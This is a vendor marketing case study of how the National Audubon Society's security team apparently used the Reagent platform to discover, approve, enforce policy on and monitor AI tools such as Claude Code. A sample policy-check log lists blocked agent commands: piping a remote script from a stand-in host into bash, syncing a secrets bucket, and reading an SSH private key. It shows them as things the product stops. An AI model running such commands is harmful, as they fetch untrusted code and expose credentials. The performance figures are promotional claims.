Case study

How the National Audubon Society made security the AI acceleration team.

Reagent gave Audubon's SOC one loop from shadow-AI discovery to live runtime enforcement: Anthropic Claude cleared in 7 days instead of 60, and AI threats contained in 25.4 seconds.

Customer  National Audubon SocietyIndustry  Conservation nonprofitPlatform  Reagent by Zaun

8.6×

Faster to clear a new AI tool

7 days, not the 60-day norm

25.4s

To contain an AI threat

a control that did not exist before

>99.99%

Of AI monitoring automated

<0.01% ever reaches a human

False negatives

across thousands of adversarial tests

“We’re being asked to adopt AI, secure it, and defend against the threats it enables. We didn’t even know how to start. It’s like a firehose. Zaun solved that.”
John Dempsey · Senior SOC Manager, National Audubon Society

The problem

The question is no longer whether to allow AI. It's whether security sees it happen or reads about it later in an incident report. A developer can install Claude Code & Cowork and ship to production the same day, while the request to evaluate it sits in a review queue. The teams pulling ahead stop trying to slow adoption down and engineer a path to safe acceleration. Zaun calls this AI Adoption Security: one loop, from the first trace of shadow AI through live detection and response, each pass faster than the last.

One loop, four stages

Reagent runs adoption as a single loop rather than a one-time gate. Here is how it ran at Audubon.

AI Adoption Security · one loop, four stages, each pass faster

01See

AI was already in the building: developers in Claude Code & Cowork, staff signing into AI apps through their identity provider. Reagent's discovery mesh mapped the real footprint from the telemetry Audubon already had, across OAuth, network, cloud, and endpoint, with nothing new to install. It surfaced shadow AI use the team had never seen, identifying 27 unsanctioned tools.

15min

to map the whole footprint

Across the telemetry they already had

OAuthNetworkCloudEndpoint

27unsanctioned tools identified.

AI footprint discovery · mapped from existing telemetry

OutcomeWhole AI footprint mapped in 15 minutes across OAuth, network, cloud, and endpoint telemetry. 27 unsanctioned tools identified.

02Decide

Legacy third-party risk maps a vendor to a framework and hands back a grade that scores the vendor in the abstract, not what the tool does to the controls you run. Reagent assessed Claude Code & Cowork against Audubon's own controls, threat-modeled it, and produced a vendor-facing list of conditions reviewed line by line.

Assessed against your live controls

NIST CSFISO 27001MITRE ATLASOWASP LLM Top 10

Negotiated into the contract

Data residencyLeast-privilege connector scopeTraining carve-outRetention controls

Cleared in 7 days. The enterprise norm is 60.

The same checks (intake, security review, threat model, legal, POV) run in parallel instead of in series.

Typical enterprise review

60 days

Reagent

7 days

8.6× faster53 days saved on a single tool

Procurement cycle · Reagent vs the enterprise norm

Clearing one tool with real conditions attached leaves a reusable control lens that makes the next tool of its kind faster to assess. Governance stops being a binder and becomes a composable framework.

Outcome

Claude Code & Cowork cleared in 7 days against Audubon's live NIST CSF and ISO 27001 controls, vs the 60-day enterprise norm.

03Enforce

Approval is the start, not the end; the hard part is making the approved policy hold at runtime. Reagent compiles the conditions into live policy and checks every tool call an agent makes and every CLI command Claude Code & Cowork runs against it before the call executes, not after it surfaces in a log.

reagent · policy.checkevery call, before it runs

CLI$ git push origin feature/auth

ALLOWEDin scope

TOOLweb.fetch("paste.ee/raw/x9f…")

BLOCKEDNetwork · unknown egress

CLI$ aws s3 sync s3://aud-prod-secrets .

BLOCKEDIdP · role not scoped

TOOLshell("curl sh.rce.sh | bash")

BLOCKEDEDR · untrusted exec

CLI$ npm install react

ALLOWEDin scope

CLI$ cat ~/.ssh/id_rsa

BLOCKEDClaude Org · sensitive path

Policy check · agent tool calls and CLI commands, inline

When a call falls outside policy, Reagent does not just flag it. It enforces through the controls an organization like Audubon already runs, at the layer that can actually stop the action: identity through IdP, the endpoint through EDR, and network appliances. One decision, pushed to whichever plane owns the action, even when the AI tool ships no permissions of its own.

One policy, enforced at three planes Audubon already runs.

Identity

IdP

Drop the scope

Revoke the session

Block the role

Endpoint

EDR

Kill the process

Quarantine the binary

Isolate the host

Network

Network appliance

Block the egress

Cut the destination

Stop the exfil

Enforcement planes · IdP, EDR, network

OutcomeApproved conditions compiled into live policy and enforced inline at the tool, agent, and CLI layer, with blocks pushed to the IdP, EDR, and network appliances.

04Detect & respond

A dashboard proving an agent behaved all quarter is worth little; the problem is the one that doesn't. ABBA, Zaun's Agent and Bot Behavioral Analytics, learns each identity's baseline and explains deviations in plain language. When a service agent spikes its sign-in rate, appears from new IPs, and assumes a role it has touched exactly never, Reagent ties identity, cloud, and endpoint into one timeline and contains it live: keys rotated, session revoked, role binding pulled, host isolated. The machine contains; a person judges.

Containment that did not exist before.

Before Reagent

None

no automated containment

With Reagent

25.4s

automated mean time to respond

Attacker windows run to hours. Most orgs still rotate credentials in days.

Monitoring runs without a human.

>99.99%automated

>99.99% handled automatically<0.01% escalated to a human

Across hundreds of millions of tool calls and prompts, with 0% false negatives validated across thousands (6,520) of adversarial test events.

Runtime · containment and monitoring

Reagent keeps cost down by filtering with semantic matching and clustering before any LLM classification runs, so the expensive model only sees what truly needs it, with no loss in coverage.

OutcomeOut-of-policy behavior contained at 25.4 seconds MTTR, >99.99% of monitoring automated, and 0% false negatives across 6,520 adversarial tests.

Why it compounds

Each pass sharpens the next. Every assessment refines the control lens; every baseline learned for one agent sharpens detection for the next. Governance that used to sit in a binder and rot becomes capability that compounds, which is why the program speeds up over time instead of collapsing under its own weight.

Audubon is already onboarding five more AI tools next quarter, with more to follow, each faster to clear than the last. The organization that adopts AI at the speed the technology moves stays ahead of the risk; the one that can't keeps learning about its own AI from the incident report. Security stops being the reason adoption stalls and becomes the reason it moves fast without breaking.

Begin

Make security the reason AI moves fast.

If your team is approving AI faster than it can see it, let's talk. A 30-minute call, no slideware.

Book a demo →Explore Reagent